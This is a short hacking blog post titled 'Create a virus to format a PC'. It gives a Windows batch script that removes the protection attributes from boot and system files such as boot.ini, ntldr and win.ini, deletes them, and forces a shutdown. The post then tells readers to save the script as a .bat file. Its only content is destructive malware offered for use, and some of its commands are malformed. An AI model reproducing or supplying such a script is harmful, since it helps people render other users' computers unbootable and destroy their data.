hackers Search

Tuesday, April 6, 2010

CREATE A VIRUS TO FORMAT A PC

@echo off
msg * KAPIL HACKER*
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
delc:\windows\win.ini
@echo off
msg *computer over.virus=very*
shutdown-s-t 10 -c " "


copy and paste the codings in bat extension
eg-virus.bat

No comments:

Post a Comment